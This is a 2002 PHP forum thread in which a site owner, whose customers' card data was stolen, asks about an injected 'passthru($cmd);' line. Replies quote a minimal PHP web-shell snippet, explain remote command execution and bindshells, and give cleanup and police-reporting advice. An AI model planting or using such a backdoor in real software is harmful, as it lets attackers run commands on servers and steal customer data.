homepage Welcome to WebmasterWorld Guest from 54.224.79.93
register, login, search, subscribe, help, library, PubCon, announcements, recent posts, open posts,
Pubcon Platinum Sponsor
Visit PubCon.com
Home / Forums Index / Code, Content, and Presentation / PHP Server Side Scripting
Forum Library : Charter : Moderators: coopster & eelixduppy & jatar k

PHP Server Side Scripting Forum

    
our server was hacked with passthru($cmd)
friday the 13th
veneerz




msg:1308284		 6:00 am on Sep 24, 2002 (gmt 0)

Hi,
Past Friday 13, our site for some reason stopped functioning. At first I myself not a php programmer spent all night and figured out the problem with session flushing and was able to fix the bug with "ob start" and "ob flush" functions.
All php pages were designed my a professional php programmer and worked perfectly until a week ago. Page after page since Friday stopped working properly and I asked my friend to examine the script. He is a good C programmer, but was able to find a new line in some of our pages which was not there before:
passthru($cmd);"
Could someone please let me know what this line is intended to do.
I received several calls from my clients that right after they placed an order on our website their credit card information was stolen and someone made unauthorized charges.

 

digitalghost




msg:1308285		 6:12 am on Sep 24, 2002 (gmt 0)

From the PHP exploit regarding the Apache hack:

Suppose a malicious user wrote the following code

<?

passthru($cmd);

?>

And then, suppose also he typed the following URL with an enter key.

[apache.org...] [7]

Then you can see the following result:

uid=203(dbai101) gid=201(dba)

veneerz




msg:1308286		 6:20 am on Sep 24, 2002 (gmt 0)

Hello Digitalghost,
Thank you for the fast reply! Now if you could please explain to the nonscripter, what does it mean in human language?
:)
digitalghost




msg:1308287		 6:30 am on Sep 24, 2002 (gmt 0)

What it means is that someone can take advantage of configuration errors to execute remote shell commands by passing them as parameters to the PHP script.

Then they gain local access with buffer overflow exploits or uploading and compiling bindshell. You can read much more about it here:

[megasecurity.org...]

veneerz




msg:1308288		 8:11 am on Sep 24, 2002 (gmt 0)

Looks like that is exactl what has happened to me............. :(
Now I have lots of police reports to write and lots of money to loose...
Is there a way to find out who did this? Hostway say they delete all logs every sunday. I found this entry in my bach_history :

<snip>

I changed MySQL and Telent passwords, is there a way to find out if the trojan like file is still resident on my server?

[edited by: jatar_k at 5:44 pm (utc) on Sep. 24, 2002]
[edit reason] removed specific info [/edit]

veneerz




msg:1308289		 10:45 am on Sep 24, 2002 (gmt 0)

I think I found out how I was hacked!
What a sleepless night.........
<some software company -no specifics, please> distributes their forum for free and install a Trojan like file on your server, which gives them access. Later they create a file or modify one of your php files which gives then anonymous access..........
I need some sleep.......I hope I wont have php daymares......

[edited by: jatar_k at 4:14 pm (utc) on Sep. 24, 2002]

[edited by: rcjordan at 6:47 pm (utc) on Sep. 24, 2002]

jatar_k




msg:1308290		 4:42 pm on Sep 24, 2002 (gmt 0)

Have you contacted them about this to see what they have to say? Can you substantiate the claim that the trojan like file was preinstalled?

Maybe someone wanders around looking for this particular forum software because they know how to exploit it.

[edited by: jatar_k at 4:45 pm (utc) on Sep. 24, 2002]

rogerd




msg:1308291		 4:45 pm on Sep 24, 2002 (gmt 0)

OpenBB - seems like an on-target product name if the above report is accurate... :(
Key_Master




msg:1308292		 5:17 pm on Sep 24, 2002 (gmt 0)

veneerz,

Considering the subject matter, you really shouldn't share your private server log info. You've just given out your site info and the pass key.

veneerz




msg:1308293		 6:36 pm on Sep 24, 2002 (gmt 0)

Key_master,
I already removed entire forum software, review my entire code, removed any suspicious script, changed all of my passwords, rearranged the root and set-up a trap. Yeah, last night was a sleepless, learning one.
jatar_k




msg:1308294		 7:06 pm on Sep 24, 2002 (gmt 0)

veneerz,

did you contact the company (who shall remain nameless)? Did they care?

If they responded I would be interested in a paraphrase of their reply.

veneerz




msg:1308295		 7:37 pm on Sep 24, 2002 (gmt 0)

Hello jatar_k,
I am 90% positive that this was the way they broke into our server. Instructions from the forum requested a chmod to 666 for one of the files. I was stupid enough not to trust them and not to check the code. But we all learn on our mistakes and now I will have dedication to learn PHP .You can never fully rely on our hosting tech support or even your web developer. You need to be able to fix everything by yourself!
Here is another thing I learned last night - hostway tech service is really bad. After I notified them about the breach, the best they could do was send me the ftp access stats and only for the last 3 days. They told me that they delete them every 3 days and if I wanted more stats I would have to pay $100.
I can not be 100% definite that it is the forum software that opened a backdoor, until I inspect their code and it will take me at least two weeks, since I do not know the php very well and will be examining it with a book and lots of online manuals. BUT! Problems started right after I installed the forum...
Here is a lesson to be learned by all from my stupidity- do not download or install anything from anyone who you do not trust.

[edited by: jatar_k at 7:39 pm (utc) on Sep. 24, 2002]
[edit reason] specifics [/edit]

veneerz




msg:1308296		 7:44 pm on Sep 24, 2002 (gmt 0)

jatar_k,
I do not want to contact them yet. First I want to give all information to the police to investigate and come to their own conclusions. Who knows how many poor souls they might have been exploiting and people never even knew about it.
jatar_k




msg:1308297		 7:44 pm on Sep 24, 2002 (gmt 0)

>>do not download or install anything from anyone who you do not trust

exactly. A basic working understanding of what is going on with everything running on your server/site is always a good plan. If, for any reason, you see anything strange, fix, change or find out more about it.

Forum software is a tough one because it links into a lot of different parts on the server and usually has of permissions to do many things. It also has thousands of lines of code that not many people can sift through and understand.

jatar_k




msg:1308298		 7:45 pm on Sep 24, 2002 (gmt 0)

veneerz, check your stickymail
veneerz




msg:1308299		 9:01 pm on Sep 24, 2002 (gmt 0)

Also I want to add something that I just read. Become extremely suspicious if you see a test.php or test1.php appear on your server. Most likely it was not created by your hosting company, but rather this file is created to gain access to your database.
jdMorgan




msg:1308300		 3:09 am on Sep 25, 2002 (gmt 0)

veneerz,

You should inform the police about the situation with the log files being deleted, and have the logs subpoenaed if possible. Also inform the hosting company that you need the logs to support a fraud investigation, and advise them strongly not to delete them (copy the investigator on this message).

You should not have to pay for information needed to investigate criminal activity - the police can get it for free (well, they may have to get a search warrant).

Jim

Global Options:
 top home search open messages active posts  
 

Home / Forums Index / Code, Content, and Presentation / PHP Server Side Scripting
rss feed

All trademarks and copyrights held by respective owners. Member comments are owned by the poster.
Terms of Service ¦ Privacy Policy ¦ Report Problem ¦ About
WebmasterWorld ® and PubCon ® are a Registered Trademarks of Pubcon Inc.
© Pubcon Inc. 1996-2012 all rights reserved